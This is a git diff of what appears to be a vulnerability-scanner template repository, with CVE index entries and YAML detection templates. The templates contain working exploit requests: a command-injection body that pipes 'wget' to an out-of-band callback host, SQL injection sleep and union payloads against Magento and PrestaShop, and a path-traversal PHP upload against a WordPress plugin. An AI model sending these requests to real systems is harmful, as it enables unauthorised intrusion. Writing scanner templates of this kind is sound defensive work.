{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
|
||||
{"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"}
|
||||
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
|
||||
{"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"}
|
||||
{"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"}
|
||||
{"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"}
|
||||
{"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"}
|
||||
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
||||
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
||||
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
|
||||
|
|
@ -2349,15 +2368,21 @@
|
|||
{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"}
|
||||
{"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"}
|
||||
{"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"}
|
||||
{"ID":"CVE-2024-27956","Info":{"Name":"WordPress Automatic Plugin \u003c= 3.92.0 - SQL Injection","Severity":"critical","Description":"The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-27956.yaml"}
|
||||
{"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"}
|
||||
{"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"}
|
||||
{"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"}
|
||||
{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
|
||||
{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
|
||||
{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
|
||||
{"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"}
|
||||
{"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"}
|
||||
{"ID":"CVE-2024-31849","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
|
||||
{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
|
||||
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
|
||||
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
|
||||
{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
|
||||
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
|
||||
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
|
||||
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
|
||||
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
|
||||
|
|
|
|||
|
|
@ -1 +1 @@
|
|||
a601931b82eff7c0eb13a1a141ecdbcd
|
||||
56b04172c1df6906eb35bc5859e652a2
|
||||
|
|
|
|||
|
|
@ -4,13 +4,15 @@ info:
|
|||
name: Cerberus Malware - Detect
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar
|
||||
reference:
|
||||
- https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar
|
||||
tags: malware,file
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- all
|
||||
|
||||
matchers-condition: or
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: raw
|
||||
|
|
@ -25,5 +27,4 @@ file:
|
|||
words:
|
||||
- "cerberus"
|
||||
case-insensitive: true
|
||||
|
||||
# digest: 490a00463044022006c23cd80a8b9974883e26b0cfb251e5834a1340be09efe1c38d397f5ea1b9470220723d8425e377276fde160744c4191d1496a8ad12d48084235c96fc995c3deace:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502200678f44915a5092567fbd406db0b2f65cef3054cdfcead092d2c7b6948b4a1140221009fc67f2da5ca58feecf9cbae46120b737b1d0c4f70697c4cb8c2aea828a3d4be:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -20,7 +20,7 @@ info:
|
|||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /guest_auth/guestIsUp.php
|
||||
POST /guest_auth/guestIsUp.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
|
||||
|
|
@ -32,4 +32,4 @@ http:
|
|||
name: http
|
||||
words:
|
||||
- "http"
|
||||
# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022067cf25f298daa2b560fc63730df160e8dec545619c2157c63da48b60dd2135e8022100eb4e2b096d6e640659ad337e303506d4a65d47211414037ec52449106f264578:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,69 @@
|
|||
id: CVE-2015-4455
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-4455
|
||||
- http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2015-4455
|
||||
cwe-id: CWE-434
|
||||
epss-score: 0.28491
|
||||
epss-percentile: 0.96807
|
||||
cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: aviary_image_editor_add-on_for_gravity_forms_project
|
||||
product: aviary_image_editor_add-on_for_gravity_forms
|
||||
framework: wordpress
|
||||
tags: cve,cve2015,packetstorm,intrusive,file-upload
|
||||
variables:
|
||||
filename: '{{rand_base(7, "abc")}}'
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /?gf_page=upload HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /?gf_page=upload HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
|
||||
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="field_id"
|
||||
|
||||
3
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="form_id"
|
||||
|
||||
1
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="gform_unique_id"
|
||||
|
||||
../../../
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
{{filename}}.phtml
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg"
|
||||
Content-Type: text/html
|
||||
|
||||
{{randstr}}
|
||||
--a54906fe12c504cb01ca836d062f82fa--
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_1, "Failed to upload file")'
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")'
|
||||
condition: and
|
||||
# digest: 4b0a0048304602210086997acf11c57218a01b0591b45c9e1e9e0171e8f12c848b7e95c91d35edf190022100973637bca29c3c89a004d205adfe81cc82708d8f58f0d0702faed7113ffcf973:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,70 @@
|
|||
id: CVE-2019-7139
|
||||
|
||||
info:
|
||||
name: Magento - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
|
||||
remediation: This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.
|
||||
reference:
|
||||
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
|
||||
- https://www.ambionics.io/blog/magento-sqli
|
||||
- https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13
|
||||
- https://github.com/koutto/jok3r-pocs
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-7139
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00582
|
||||
epss-percentile: 0.778
|
||||
cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 4
|
||||
vendor: magento
|
||||
product: magento
|
||||
framework: magento
|
||||
shodan-query: http.component:"Magento"
|
||||
tags: cve,cve2019,sqli,magento
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: time-based
|
||||
dsl:
|
||||
- 'duration_2>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(body_1, "text/x-magento-init")'
|
||||
- 'contains(content_type_2, "application/json")'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: blind-based
|
||||
dsl:
|
||||
- 'contains(body_1, "text/x-magento-init")'
|
||||
- 'contains(content_type_3, "application/json") && contains(content_type_4, "application/json")'
|
||||
- 'status_code_3 == 200 && status_code_4 == 400'
|
||||
- 'len(body_3) == 2 && len(body_4) == 2'
|
||||
condition: and
|
||||
# digest: 490a0046304402200eea406b4dd10703c590fb378ef5037c6dd0f56ba1b1059e66e8105bca0f38f7022021af5ceb6e9087fbafeb243ba19617bd9e3e9aaff723ebd4fea7892cee66428d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -27,7 +27,7 @@ info:
|
|||
vendor: hitachi
|
||||
product: vantara_pentaho_business_analytics_server
|
||||
shodan-query: http.favicon.hash:1749354953
|
||||
tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi
|
||||
tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
|
@ -50,4 +50,4 @@ http:
|
|||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
# digest: 4b0a004830460221008c170d16acd8d4fcd8b061a57759895cb1c1f4d2d844154a2bc28d348695383502210082727ca9d4adcdf1004042ef259119a55de484872ede8cad1aaf0ded1f7c2d8d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b6741a571d75e359c60ca79e0081337777b9697c68b0739b50509dc80d199bb3022051e8b48b4f9a5f97c6c7c753a04b14967c4a085998f070e01e462a0e8e0a6561:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -30,7 +30,7 @@ info:
|
|||
product: vbulletin
|
||||
shodan-query: http.component:"vBulletin"
|
||||
google-query: intext:"Powered By vBulletin"
|
||||
tags: cve2023,cve,vbulletin,rce,kev
|
||||
tags: cve,cve2023,vbulletin,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
|
@ -58,4 +58,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100e3543011414a95d92a92d49677025acf633380fe2b7f42668cac5c7352466dd5022100fb6ff50e66a0ef042fe1a9d2f16946b7092d1049b62c8660449fb6c7fec3fd16:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ce2bf923005a767a1b859b3e4f2a4fce8709e03f3e8ca3913a9b86099ccf4d6d02203544ccb00bbe8541385556ded06192cb9d058e991038779cf79a4934da6495bf:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,66 @@
|
|||
id: CVE-2023-27032
|
||||
|
||||
info:
|
||||
name: PrestaShop AdvancedPopupCreator - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||
reference:
|
||||
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
|
||||
- https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-27032
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00106
|
||||
epss-percentile: 0.42495
|
||||
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
vendor: idnovate
|
||||
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
verified: true
|
||||
tags: cve,cve2023,sqli,prestashop,advancedpopupcreator
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout 10s
|
||||
POST /module/advancedpopupcreator/popup HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- duration>=6
|
||||
- status_code == 200
|
||||
- contains(content_type, "text/html")
|
||||
- contains_all(body, 'popups','hasError')
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: time
|
||||
group: 1
|
||||
regex:
|
||||
- ',"time":([0-9]+),'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: token
|
||||
group: 1
|
||||
regex:
|
||||
- ',"static_token":"([0-9a-z]+)",'
|
||||
internal: true
|
||||
# digest: 4a0a00473045022100aa46ba83eaa1e937eb89a6c4296e4efd072af40a4bcf8e687f6f3ea2551ed66502204452a505bdad3d329e7fdb44f2aa4ad0a0be98e174650aed8a5f057d51935856:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -28,7 +28,7 @@ info:
|
|||
vendor: gitlab
|
||||
product: gitlab
|
||||
shodan-query: title:"Gitlab"
|
||||
tags: cve2023,cve,gitlab,lfi,kev,authenticated,intrusive
|
||||
tags: cve2023,cve,gitlab,lfi,authenticated,intrusive
|
||||
variables:
|
||||
data: "{{rand_base(5)}}"
|
||||
|
||||
|
|
@ -210,4 +210,4 @@ http:
|
|||
- '"url":"\/uploads\/([0-9a-z]+)\/'
|
||||
internal: true
|
||||
part: body
|
||||
# digest: 4a0a00473045022100fce13295307498034c0bfb69917e3f2561064c0812d5c1a8e27c0bcae996910102202f9c489427503620b35cc6d39d3bbc7826a351b2fd88f2c05ef19a5016ccfd70:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ce74731d4f03315a39203e3aa3775a80c5a82171b15cb8251c13b84816f869a502200e2fc502e7a3ab3a6d1d51fb7acb0c6a69777c3fb805501cc36ffdd30e3d4f27:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2023-32077
|
||||
|
||||
info:
|
||||
name: Netmaker - Hardcoded DNS Secret Key
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: high
|
||||
description: |
|
||||
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2023-32077
|
||||
cwe-id: CWE-321,CWE-798
|
||||
epss-score: 0.0006
|
||||
epss-percentile: 0.24707
|
||||
cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: gravitl
|
||||
product: netmaker
|
||||
shodan-query: html:"netmaker"
|
||||
tags: cve,cve2023,info-key,netmaker,exposure
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
